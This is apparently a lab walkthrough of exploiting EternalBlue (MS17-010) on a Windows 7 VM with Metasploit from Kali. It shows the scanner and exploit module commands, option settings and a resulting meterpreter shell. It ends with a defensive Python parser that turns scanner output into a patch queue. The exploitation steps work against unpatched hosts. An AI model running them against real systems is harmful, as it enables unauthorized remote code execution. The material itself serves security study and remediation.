EternalBlue

Prerequisites

- Kali as the attacker machine
- Windows 7 as the target machine
- Firewall turned off

Steps
- Make sure the two machines are on the same subnet and can ping each other.
  - Kali: `ifconfig`
  - Windows 7: `ipconfig`
- On Kali, use the `msfconsole` command to enter msf:

```
msf6 >
```
- Search for the ms17-010 modules: `search ms17-010`

```
msf6 > search ms17-010

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce

msf6 >
```
- Select the ms17-010 auxiliary scanner module: `use auxiliary/scanner/smb/smb_ms17_010`

```
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) >
```
- Check the module options, set the target IP, and run:

`show options`

```
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads (max one per host)

msf6 auxiliary(scanner/smb/smb_ms17_010) >
```

`set RHOSTS ip`

```
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.234.129
rhosts => 192.168.234.129
msf6 auxiliary(scanner/smb/smb_ms17_010) >
```

`run`

```
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.234.129:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7600 x64 (64-bit)
[*] 192.168.234.129:445   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) >
```
- The scanner reports that the host is likely vulnerable to EternalBlue (ms17-010), so switch to the exploit module: `use exploit/windows/smb/ms17_010_eternalblue`
- Check the module options, set the target IP, and run:

`show options`

```
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see
msf6 exploit(windows/smb/ms17_010_eternalblue) >
```

`set RHOSTS ip`

```
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts ip
rhosts => ip
msf6 exploit(windows/smb/ms17_010_eternalblue) >
```

`run`

```
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
```
- A shell is obtained; run `ipconfig` to view the IP address:

```
meterpreter > ipconfig

Interface  1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff

Interface 11
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:11:ce:b9
MTU          : 1500
IPv4 Address : 192.168.234.129
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::178:cae1:7a5e:4017
IPv6 Netmask : ffff:ffff:ffff:ffff::

Interface 12
============
Name         : Microsoft ISATAP Adapter
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : fe80::5efe:c0a8:ea81
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff

meterpreter >
```
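On the defensive side, the useful artifact from this walkthrough is the `smb_ms17_010` scanner output, which an administrator can run against their own network to build a patch and isolation queue. The following is an added example (not part of the original post or of Metasploit) that parses that output into structured findings; only the `[+] ... VULNERABLE` line format is taken from the page, the `[-]` not-vulnerable and DOUBLEPULSAR message formats are assumptions.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample output. Line 1 copies the format shown in the walkthrough;
# the other host lines are assumed formats for illustration.
SAMPLE_OUTPUT = """\
[+] 192.168.234.129:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7600 x64 (64-bit)
[-] 192.168.234.130:445   - Host does NOT appear vulnerable.
[+] 192.168.234.131:445   - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit) - DOUBLEPULSAR IMPLANT DETECTED
[*] 192.168.234.129:445   - Scanned 3 of 3 hosts (100% complete)
[*] Auxiliary module execution completed
"""

# "[tag] host:port - message"; [*] lines are progress/info and carry no verdict.
HOST_RE = re.compile(r"^\[(?P<tag>[+\-*])\]\s+(?P<host>[\d.]+):(?P<port>\d+)\s+-\s+(?P<msg>.*)$")


@dataclass
class ScanFinding:
    host: str
    port: int
    vulnerable: bool
    os_banner: Optional[str]  # OS string the scanner appends after the verdict
    implant: bool             # DOUBLEPULSAR already present: treat as compromised


def parse_scan_output(text: str) -> List[ScanFinding]:
    findings = []
    for line in text.splitlines():
        m = HOST_RE.match(line.strip())
        if not m or m.group("tag") == "*":
            continue  # banner, completion or progress line
        msg = m.group("msg")
        vulnerable = m.group("tag") == "+" and "VULNERABLE" in msg
        # The verdict, OS banner and any implant note are " - " separated.
        parts = [p.strip() for p in msg.split(" - ")]
        os_banner = parts[1] if vulnerable and len(parts) > 1 else None
        implant = "DOUBLEPULSAR" in msg.upper()
        findings.append(ScanFinding(m.group("host"), int(m.group("port")), vulnerable, os_banner, implant))
    return findings


def remediation_queue(findings: List[ScanFinding]) -> List[ScanFinding]:
    """Vulnerable hosts only; implanted hosts first (isolate and investigate), then the patch queue."""
    return sorted((f for f in findings if f.vulnerable), key=lambda f: (not f.implant, f.host))
```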